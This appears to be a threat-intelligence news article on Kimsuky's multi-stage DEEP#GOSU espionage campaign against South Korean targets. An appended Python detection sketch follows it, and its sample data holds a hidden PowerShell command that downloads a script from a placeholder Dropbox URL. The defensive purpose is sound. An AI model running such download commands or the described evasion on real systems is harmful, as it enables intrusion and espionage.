North Korea-linked threat group Kimsuky has adopted a longer, eight-step attack chain that abuses legitimate cloud services and employs evasive malware to conduct cyber espionage and financial crimes against South Korean entities.
In a campaign called “DEEP#GOSU,” attributed to the group, the cyber espionage operators leaned heavily on a “living off the land” strategy, using commands to install a variety of .NET assemblies (legitimate code components for .NET applications) to form the basis of the attacker’s toolkit, Securonix researchers wrote in a threat analysis today.
Kimsuky also used LNK files attached to emails, command scripts downloaded from Dropbox, and code written in PowerShell and VBScript to conduct offensive operations.
While typical cyberattacks use five or fewer stages, the DEEP#GOSU campaign used eight. And while some tools could be detected by virus scanners and other defensive technologies, attackers actively aimed to foil detection, says Oleg Kolesnikov, vice president of threat research at Securonix.
“There were many different components and payloads, and different payload components had different scanner detection rates,” he says. “Because the attackers actively used security tool evasion and disruption techniques, including closing security tools and adding payloads to exclusions, among other things, the number of scanners that detected this was likely less relevant in this case.”
The group Kimsuky, also known as APT43, Emerald Sleet and Velvet Chollima, has grown its activity in 2023, shifting to a greater focus on cryptocurrency beyond its traditional focus on cyber espionage. Kimsuky is well known for its skilled spear-phishing and not necessarily for its technical sophistication, but the latest attack showed that the group has evolved somewhat, according to the analysis written by three Securonix researchers.
“The malware payloads… represent a sophisticated, multi-stage threat, designed to operate covertly on Windows systems, especially from a network monitoring perspective,” the three researchers said in their analysis. “Each step was encrypted using AES and a common password and IV [initialization vector] which should minimize network scan or flat file detections.”
Using Dropbox and Google to bypass security checks
The first phase of the attack is executed when the user opens an LNK file attached to an email, which downloads the PowerShell code from Dropbox. The code executed during the second phase downloads additional scripts from Dropbox and instructs the compromised system to install a remote access Trojan, TutClient, in phase 3.
Heavy use of Dropbox, and Google in later stages, helps avoid detection, threat researchers at Securonix said in the analysis.
“All C2 communication is handled through legitimate services like Dropbox or Google Docs that allow the malware to integrate undetected into normal network traffic,” they wrote. “Because these payloads came from remote sources like Dropbox, they allowed the malware’s maintainers to dynamically update its functionality or implement additional modules without direct interaction with the system.”
Later stages of the attack install a script that runs randomly over a matter of hours to help monitor and control systems and provide persistence. The final stage monitors user activity by logging keystrokes on the compromised system.
Multi-phase attacks highlight defense in depth
While detection rates for the initial stages of the attack ranged from 5% to 45% for host-based security, network security platforms may struggle to detect later stages of the attack because the Kimsuky threat actors use encrypted traffic, legitimate cloud file-transfer services, and downloaded .NET components.
The multi-pronged attack highlights the benefits of having multiple layers of defense, Kolesnikov says.
“In our experience, in cases like this, an up-to-date antivirus may not be sufficient because the behaviors exhibited include disruption and circumvention of security tools,” says Kolesnikov. “Our recommendation is that organizations leverage defense in depth so they don’t rely on just one specific security tool.”
Email security gateways, for example, would likely block the LNK file due to its enormous size of 2.2 MB, compared to the typical size measured in kilobytes, he says.
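As an added defender-side illustration, not code from the article or from Securonix, the following Python sketches two checks suggested by the details above: a .lnk mail attachment far larger than a real shortcut needs to be, and a user-launched script host whose command line references Dropbox or Google Docs, the cloud services the campaign used for payload delivery and C2. The size cutoff, the parent-process list and the sample telemetry are assumptions constructed for the example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Cutoff is an assumption drawn from the article: the campaign's LNK was 2.2 MB,
# while a genuine shortcut is normally a few kilobytes.
LNK_SIZE_THRESHOLD = 100 * 1024

# Services the article names as payload-delivery and C2 channels.
CLOUD_HOSTS = ("dropbox.com", "docs.google.com")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")
# Parents that indicate a user double-clicked something (assumption: shell or mail client).
USER_LAUNCHERS = ("explorer.exe", "outlook.exe")

@dataclass
class Finding:
    rule: str
    detail: str

def check_attachment(name: str, size_bytes: int) -> Optional[Finding]:
    """Flag .lnk mail attachments far larger than any real shortcut needs to be."""
    if name.lower().endswith(".lnk") and size_bytes > LNK_SIZE_THRESHOLD:
        return Finding("oversized_lnk_attachment", f"{name} is {size_bytes} bytes")
    return None

def check_process(parent_image: str, image: str, cmdline: str) -> Optional[Finding]:
    """Flag a script host launched by the user whose command line names a cloud-storage host."""
    if not image.lower().endswith(SCRIPT_HOSTS):
        return None
    if not parent_image.lower().endswith(USER_LAUNCHERS):
        return None
    if any(host in cmdline.lower() for host in CLOUD_HOSTS):
        return Finding("user_launched_script_cloud_fetch", cmdline)
    return None

def run_detections(attachments: List[Tuple[str, int]],
                   processes: List[Tuple[str, str, str]]) -> List[Finding]:
    """Run both rules over attachment metadata and process-creation events."""
    findings = [f for name, size in attachments if (f := check_attachment(name, size))]
    findings += [f for p, i, c in processes if (f := check_process(p, i, c))]
    return findings

# Constructed sample telemetry for illustration; not data from the campaign.
SAMPLE_ATTACHMENTS = [("report.pdf", 180_000), ("Invoice.lnk", 2_200_000), ("link.lnk", 1_500)]
SAMPLE_PROCESSES = [
    ("explorer.exe", "powershell.exe",
     "powershell.exe -w hidden -c \"iwr https://dl.dropbox.com/s/EXAMPLE/a.ps1 -o $env:TEMP\\a.ps1\""),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\u\\todo.txt"),
]

if __name__ == "__main__":
    for finding in run_detections(SAMPLE_ATTACHMENTS, SAMPLE_PROCESSES):
        print(f"[{finding.rule}] {finding.detail}")
```

Because legitimate Dropbox and Google Docs traffic is common in most environments, the second rule is a triage signal to be correlated with the LNK-attachment finding and with later-stage behaviour, not a verdict on its own.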